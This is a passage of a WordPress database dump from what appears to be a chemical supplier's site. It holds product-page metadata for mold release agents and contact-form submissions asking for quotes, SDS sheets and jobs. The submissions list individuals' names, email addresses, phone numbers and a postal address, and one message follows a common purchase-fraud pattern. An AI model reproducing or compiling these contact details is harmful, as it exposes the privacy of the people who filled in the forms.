:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (38079, 4283, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (38080, 4283, '_seq_num', '675'); 
INSERT INTO `wp_postmeta` VALUES (38081, 4283, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (38082, 4283, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (38083, 4283, '_field_1', 'Lyn Imperial'); 
INSERT INTO `wp_postmeta` VALUES (38084, 4283, '_field_10', 'Air Liquide / MEDAL'); 
INSERT INTO `wp_postmeta` VALUES (38085, 4283, '_field_2', 'lyn.imperial@airliquide.com'); 
INSERT INTO `wp_postmeta` VALUES (38086, 4283, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (38087, 4283, '_field_3', 'Can I please get a price quote for 1 quart samples of the following items: \r\nEpon 826\r\nHeloxy 67\r\nEpikure 3046\r\n'); 
INSERT INTO `wp_postmeta` VALUES (38088, 4283, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (38089, 4283, '_sub_id', '4283'); 
INSERT INTO `wp_postmeta` VALUES (38090, 4284, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (38091, 4284, '_seq_num', '676'); 
INSERT INTO `wp_postmeta` VALUES (38092, 4284, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (38093, 4284, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (38094, 4284, '_field_1', 'Ligia Hernandez'); 
INSERT INTO `wp_postmeta` VALUES (38095, 4284, '_field_10', 'WeChem'); 
INSERT INTO `wp_postmeta` VALUES (38096, 4284, '_field_2', 'lhernandez@wechem.com'); 
INSERT INTO `wp_postmeta` VALUES (38097, 4284, '_field_8', '(504) 733-1152'); 
INSERT INTO `wp_postmeta` VALUES (38098, 4284, '_field_3', 'I have been trying to reset my password for the last 2 hrs. and no e-mail has been sent.  I need to log in to get the SDS section.\r\n\r\nthank you.'); 
INSERT INTO `wp_postmeta` VALUES (38099, 4284, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (38100, 4284, '_sub_id', '4284'); 
INSERT INTO `wp_postmeta` VALUES (38101, 4287, '_wp_attached_file', '2017/05/shutterstock_530979514.jpg'); 
INSERT INTO `wp_postmeta` VALUES (38102, 4287, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:667;s:4:"file";s:34:"2017/05/shutterstock_530979514.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_530979514-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_530979514-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_530979514-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_530979514-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_530979514-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_530979514-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_530979514-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"7";s:8:"quantity";d:63;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (38103, 4288, '_edit_lock', '1496689816:2'); 
INSERT INTO `wp_postmeta` VALUES (38104, 4288, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (38105, 4289, '_wp_attached_file', '2017/05/shutterstock_116206609.jpg'); 
INSERT INTO `wp_postmeta` VALUES (38106, 4289, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:667;s:6:"height";i:1000;s:4:"file";s:34:"2017/05/shutterstock_116206609.jpg";s:5:"sizes";a:6:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_116206609-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_116206609-534x800.jpg";s:5:"width";i:534;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_116206609-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_116206609-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_116206609-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_116206609-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:86;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (38107, 4289, '_wp_attachment_image_alt', ''); 
INSERT INTO `wp_postmeta` VALUES (38108, 4288, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (38109, 4288, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (38110, 4288, '_thumbnail_id', '4289'); 
INSERT INTO `wp_postmeta` VALUES (38111, 4288, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (38112, 4288, '716_default_editor', 'Optimized for release for all Concrete, masonry, and veneer materials:\r\n<ul>\r\n 	<li>Glass-fiber reinforced concrete (GFRC)</li>\r\n 	<li>High-Slag Concrete</li>\r\n 	<li>Release from precast composite molds made of Polyurethane, Silicone, Rubber, Epoxy, and Fiberglass</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (38113, 4288, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (38114, 4288, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (38115, 4288, '317_default_editor', 'quart, gallon, 5 gallon, 55 gallon drum, 275 gallon tote'); 
INSERT INTO `wp_postmeta` VALUES (38116, 4288, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (38117, 4288, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (38118, 4288, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (38119, 4288, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (38120, 4288, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (38121, 4288, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (38122, 4288, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (38123, 4288, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (38124, 4288, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (38125, 4288, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (38126, 4288, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (38127, 4288, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (38128, 4288, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (38129, 4288, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (38130, 4288, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (38131, 4288, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (38132, 4288, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (38133, 4288, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (38134, 4288, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (38135, 4288, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (38136, 4288, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (38137, 4288, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (38138, 4288, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (38139, 4288, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (38140, 4288, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (38141, 4288, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (38142, 4288, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (38143, 4288, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (38144, 4288, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (38145, 4288, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (38146, 4288, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (38147, 4288, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (38148, 4288, '_ywtm_content_tab_description', '<h1>ReleaSys™ CR - Concrete Release Agent</h1>\r\nMiller-'); 
INSERT INTO `wp_postmeta` VALUES (38149, 4288, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (38150, 4288, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (38151, 4288, '_yoast_wpseo_primary_product_cat', '529'); 
INSERT INTO `wp_postmeta` VALUES (38152, 4288, '_yoast_wpseo_focuskw_text_input', 'concrete release agent'); 
INSERT INTO `wp_postmeta` VALUES (38153, 4288, '_yoast_wpseo_focuskw', 'concrete release agent'); 
INSERT INTO `wp_postmeta` VALUES (38154, 4288, '_yoast_wpseo_title', 'Concrete Release Agent | ReleaSys™ CR | High-Performance Mold Release |'); 
INSERT INTO `wp_postmeta` VALUES (38155, 4288, '_yoast_wpseo_metadesc', 'ReleaSys CR concrete release agent is designed to optimize the demolding of complex concrete parts while providing a superior finish and appearance.'); 
INSERT INTO `wp_postmeta` VALUES (38156, 4288, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (38157, 4288, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (38158, 4288, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (38159, 4291, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (38160, 4291, '_seq_num', '304'); 
INSERT INTO `wp_postmeta` VALUES (38161, 4291, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (38162, 4291, '_field_12', 'George Coidakis'); 
INSERT INTO `wp_postmeta` VALUES (38163, 4291, '_field_13', 'Varitron'); 
INSERT INTO `wp_postmeta` VALUES (38164, 4291, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (38165, 4291, '_field_14', 'gcoidakis@varitron.com'); 
INSERT INTO `wp_postmeta` VALUES (38166, 4291, '_field_15', '(603) 577-8855'); 
INSERT INTO `wp_postmeta` VALUES (38167, 4291, '_field_16', 'phone extension 271\r\nLooking for shelf life information for two items, Connector Lubricant MS-381HC and Urethane Coating L0102A\r\nThank You'); 
INSERT INTO `wp_postmeta` VALUES (38168, 4291, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (38169, 4291, '_sub_id', '4291'); 
INSERT INTO `wp_postmeta` VALUES (38170, 4293, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (38171, 4293, '_seq_num', '677'); 
INSERT INTO `wp_postmeta` VALUES (38172, 4293, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (38173, 4293, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (38174, 4293, '_field_1', 'Brad Herrmann'); 
INSERT INTO `wp_postmeta` VALUES (38175, 4293, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (38176, 4293, '_field_2', 'Brad@FlackTek.net'); 
INSERT INTO `wp_postmeta` VALUES (38177, 4293, '_field_8', '(443) 605-4242'); 
INSERT INTO `wp_postmeta` VALUES (38178, 4293, '_field_3', 'I was wondering if I could get in contact with some one from materials engineering. I have a question about mixing some of Miller-stephenson&#039;s products. \r\n\r\n'); 
INSERT INTO `wp_postmeta` VALUES (38179, 4293, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (38180, 4293, '_sub_id', '4293'); 
INSERT INTO `wp_postmeta` VALUES (38182, 4311, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (38183, 4311, '_seq_num', '678'); 
INSERT INTO `wp_postmeta` VALUES (38184, 4311, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (38185, 4311, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (38186, 4311, '_field_1', 'touati kihal'); 
INSERT INTO `wp_postmeta` VALUES (38187, 4311, '_field_10', 'touati'); 
INSERT INTO `wp_postmeta` VALUES (38188, 4311, '_field_2', 'touatikihal@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (38189, 4311, '_field_8', '(213) 696-3291'); 
INSERT INTO `wp_postmeta` VALUES (38190, 4311, '_field_3', 'Hey sir or miss\r\nI would like to represent your company\r\nby putting a few samples , i m a fan of your best Company please send me Samples from you, thanks!\r\ni will be very happy\r\nAddress\r\nkihal bachir djalfa messaad ALGERIA\r\nTAHIRI ABERRAHMEN\r\n17003\r\nALGERIA\r\n'); 
INSERT INTO `wp_postmeta` VALUES (38191, 4311, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (38192, 4311, '_sub_id', '4311'); 
INSERT INTO `wp_postmeta` VALUES (38193, 4312, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (38194, 4312, '_seq_num', '679'); 
INSERT INTO `wp_postmeta` VALUES (38195, 4312, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (38196, 4312, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (38197, 4312, '_field_1', 'Massimo'); 
INSERT INTO `wp_postmeta` VALUES (38198, 4312, '_field_10', 'Leonardo Company Spa'); 
INSERT INTO `wp_postmeta` VALUES (38199, 4312, '_field_2', 'massimo.federico@leonardocompany.com'); 
INSERT INTO `wp_postmeta` VALUES (38200, 4312, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (38201, 4312, '_field_3', 'Hi, in my industrial use product Glyptal &quot;MS-730”. I need to have the MSDS last review, in Italian (the REACH legislation in Europe imposes the obligation to receive from the manufacturer in the language of the user requesting the MSDS). \nThanks for your availability.\n'); 
INSERT INTO `wp_postmeta` VALUES (38202, 4312, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (38203, 4312, '_sub_id', '4312'); 
INSERT INTO `wp_postmeta` VALUES (38204, 4313, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (38205, 4313, '_seq_num', '680'); 
INSERT INTO `wp_postmeta` VALUES (38206, 4313, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (38207, 4313, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (38208, 4313, '_field_1', 'DASSON PILLAY'); 
INSERT INTO `wp_postmeta` VALUES (38209, 4313, '_field_10', 'UNISTAR INKS'); 
INSERT INTO `wp_postmeta` VALUES (38210, 4313, '_field_2', 'STARDAS@MWEB.CO.ZA'); 
INSERT INTO `wp_postmeta` VALUES (38211, 4313, '_field_8', '(273) 146-1339'); 
INSERT INTO `wp_postmeta` VALUES (38212, 4313, '_field_3', 'I am trying to source alternative cycloaliphatic epoxy equivalents to\r\nARALDITE GY 250 and GABEPRO GPE 221 to be used in the manufacture of conductive inks.'); 
INSERT INTO `wp_postmeta` VALUES (38213, 4313, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (38214, 4313, '_sub_id', '4313'); 
INSERT INTO `wp_postmeta` VALUES (38215, 4314, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (38216, 4314, '_seq_num', '681'); 
INSERT INTO `wp_postmeta` VALUES (38217, 4314, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (38218, 4314, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (38219, 4314, '_field_1', 'Eddie Prendergast'); 
INSERT INTO `wp_postmeta` VALUES (38220, 4314, '_field_10', 'Atto Abrasives Limited'); 
INSERT INTO `wp_postmeta` VALUES (38221, 4314, '_field_2', 'eprendergast@attoabrasives.com'); 
INSERT INTO `wp_postmeta` VALUES (38222, 4314, '_field_8', '(353) 683-5705'); 
INSERT INTO `wp_postmeta` VALUES (38223, 4314, '_field_3', 'Hi\r\nI was hoping that you could give us a price quote for epoxy resin&#039;s Epon-863, Epon-828, Epon-862 as well as the curing agents Ancamide-500/Epikure-3030 and Ancamine-1638/Epikure-3271.\r\nWe are looking for a supplier of these chemicals in the California region to supply our Tijuana plant.\r\n\r\nLook forward to hearing from you \r\n\r\nRegards\r\n\r\nEddie  '); 
INSERT INTO `wp_postmeta` VALUES (38224, 4314, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (38225, 4314, '_sub_id', '4314'); 
INSERT INTO `wp_postmeta` VALUES (38226, 4316, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (38227, 4316, '_seq_num', '305'); 
INSERT INTO `wp_postmeta` VALUES (38228, 4316, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (38229, 4316, '_field_12', 'RAMASAMY SARAVANAN RAMASAMY'); 
INSERT INTO `wp_postmeta` VALUES (38230, 4316, '_field_13', 'M/S.FLYTEX LUBRICANTS INDUSTRY LLC'); 
INSERT INTO `wp_postmeta` VALUES (38231, 4316, '_field_18', 'FLYTEX LUBRICANTS INDUSTRY LLC'); 
INSERT INTO `wp_postmeta` VALUES (38232, 4316, '_field_14', 'ramflytexlube@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (38233, 4316, '_field_15', '(050) 547-1095'); 
INSERT INTO `wp_postmeta` VALUES (38234, 4316, '_field_16', 'Dear Sir,\r\nGood Morning.\r\nGreetings and Good day,Hope this mail finds you well.\r\nI would like a suitable Opening in your esteemed concern and i wish to apply for the same.\r\n\r\nKindly check this attached my detailed CV is for your information please.\r\n\r\nWith regards,\r\n\r\nMr.ram\r\nflytex lubrcants industry llc,\r\n\r\najman,UAE.\r\n\r\nContact mobile no:+971505471095 (whatsapp no also same )\r\n\r\n\r\n\r\n'); 
INSERT INTO `wp_postmeta` VALUES (38235, 4316, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (38236, 4316, '_sub_id', '4316'); 
INSERT INTO `wp_postmeta` VALUES (38237, 4317, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (38238, 4317, '_seq_num', '682'); 
INSERT INTO `wp_postmeta` VALUES (38239, 4317, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (38240, 4317, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (38241, 4317, '_field_1', 'Clive Cromack'); 
INSERT INTO `wp_postmeta` VALUES (38242, 4317, '_field_10', 'Clivecromack Ltd'); 
INSERT INTO `wp_postmeta` VALUES (38243, 4317, '_field_2', 'ceoteam.addmin00000@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (38244, 4317, '_field_8', '(605) 298-2605'); 
INSERT INTO `wp_postmeta` VALUES (38245, 4317, '_field_3', '\r\n\r\n\r\n\r\nHello Sales \r\n\r\nI would like to purchase some of your products, before we proceed i would like to make some queries \r\n\r\nbelow. Do you accept Master Card or Visa Card ? Yes / No \r\n\r\nCan my freight forwarder come for the pick up of my order directly from your facility to us  in \r\n\r\nNicaragua ? Yes / No \r\n\r\nI will appreciate if you return to us by email in-order to proceed. Looking forward to your quick \r\n\r\nresponse. \r\n\r\nBest Regards,\r\n\r\nClive Cromack,\r\n\r\nStore Name: Clivecromack Ltd\r\nKm. 4 1/1 Carretera Norte,11062\r\nManagua, Nicaragua.\r\n+505 8460 3155\r\n \r\n\r\n\r\n\r\n'); 
INSERT INTO `wp_postmeta` VALUES (38246, 4317, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (38247, 4317, '_sub_id', '4317'); 
INSERT INTO `wp_postmeta` VALUES (38248, 4319, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (38249, 4319, '_seq_num', '683'); 
INSERT INTO `wp_postmeta` VALUES (38250, 4319, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (38251, 4319, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (38252, 4319, '_field_1', 'marco'); 
INSERT INTO `wp_postmeta` VALUES (38253, 4319, '_field_10', 'Racing Trevor'); 
INSERT INTO `wp_postmeta` VALUES (38254, 4319, '_field_2', 'racingtrevor@racingtrevor.sk'); 
INSERT INTO `wp_postmeta` VALUES (38255, 4319, '_field_8', '(421) 904-2573'); 
INSERT INTO `wp_postmeta` VALUES (38256, 4319, '_field_3', 'Hello here is Marco from Racing Trevor, i would like to ask you about price to Krytox GPL 217 for all size alternatives, \r\nBest regards \r\nRacing Trevor'); 
INSERT INTO `wp_postmeta` VALUES (38257, 4319, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (38258, 4319, '_sub_id', '4319'); 
INSERT INTO `wp_postmeta` VALUES (38259, 305, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (38261, 4321, '_edit_lock', '1497445094:3'); 
INSERT INTO `wp_postmeta` VALUES (38262, 4321, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (38263, 4321, '_footer', 'normal'); 
INSERT INTO `wp_postmeta` VALUES (38264, 4321, '_wp_page_template', 'page-blank-title-center.php'); 
INSERT INTO `wp_postmeta` VALUES (38265, 4321, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (38266, 4321, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (38267, 4321, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (38268, 4321, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (38269, 4326, '_edit_lock', '1496232072:3'); 
INSERT INTO `wp_postmeta` VALUES (38270, 4326, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (38271, 4321, '_thumbnail_id', '4180'); 
INSERT INTO `wp_postmeta` VALUES (38272, 4330, '_wp_attached_file', '2017/05/shutterstock_521421886.jpg'); 
INSERT INTO `wp_postmeta` VALUES (38273, 4331, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (38274, 4331, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (38275, 4331, '_menu_item_type', 'post_type'); 
INSERT INTO `wp_postmeta` VALUES (38276, 4331, '_menu_item_menu_item_parent', '0'); 
INSERT INTO `wp_postmeta` VALUES (38277, 4331, '_menu_item_object_id', '4321'); 
INSERT INTO `wp_postmeta` VALUES (38278, 4331, '_menu_item_object', 'page'); 
INSERT INTO `wp_postmeta` VALUES (38279, 4331, '_menu_item_target', ''); 
INSERT INTO `wp_postmeta` VALUES (38280, 4331, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'); 
INSERT INTO `wp_postmeta` VALUES (38281, 4331, '_menu_item_xfn', ''); 
INSERT INTO `wp_postmeta` VALUES (38282, 4331, '_menu_item_url', ''); 
INSERT INTO `wp_postmeta` VALUES (38283, 4330, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:668;s:4:"file";s:34:"2017/05/shutterstock_521421886.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_521421886-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_521421886-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_521421886-768x513.jpg";s:5:"width";i:768;s:6:"height";i:513;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_521421886-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_521421886-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_521421886-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_521421886-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (38284, 4326, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (38285, 4326, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (38286, 4326, '_thumbnail_id', '4340'); 
INSERT INTO `wp_postmeta` VALUES (38287, 4326, '312_default_editor', '<strong>Physical Properties:</strong>\r\n<table style="height: 91px;" width="385">\r\n<tbody>\r\n<tr>\r\n<td width="111">Primary Polymer</td>\r\n<td width="159">Crosslinking Polysiloxane</td>\r\n</tr>\r\n<tr>\r\n<td>Appearance</td>\r\n<td>White Emulsion</td>\r\n</tr>\r\n<tr>\r\n<td>Odor</td>\r\n<td>None</td>\r\n</tr>\r\n<tr>\r\n<td>Specific Gravity</td>\r\n<td>1.0 g/mL</td>\r\n</tr>\r\n<tr>\r\n<td>Flash Point</td>\r\n<td>None</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (38288, 4326, '716_default_editor', '<strong>Release Agent Applications:</strong>\r\n\r\nReleaSys 9800 is formulated to provide unmatched utility in compression, injection and transfer molding with the following materials. <a href="https://www.miller-stephenson.com/troubleshooting-common-molding-issues/">For help with application or troubleshooting concerns while using ReleaSys.</a>\r\n<table style="height: 64px;" width="640">\r\n<tbody>\r\n<tr>\r\n<td width="167">•       Organic Polymers</td>\r\n<td width="168">•          Thermoplastics</td>\r\n</tr>\r\n<tr>\r\n<td width="167">•       Thermosetting resins</td>\r\n<td width="168">•          Elastomers (Natural and Synthetic)</td>\r\n</tr>\r\n<tr>\r\n<td width="167">•       Fluoroelastomers</td>\r\n<td width="168">•          EPDM</td>\r\n</tr>\r\n<tr>\r\n<td width="167">•       Acrylics</td>\r\n<td width="168">•          Polyurethane / TPU</td>\r\n</tr>\r\n<tr>\r\n<td width="167">•       Neoprene</td>\r\n<td width="168">•          Melamine</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (38289, 4326, '1367_default_editor', ''); 
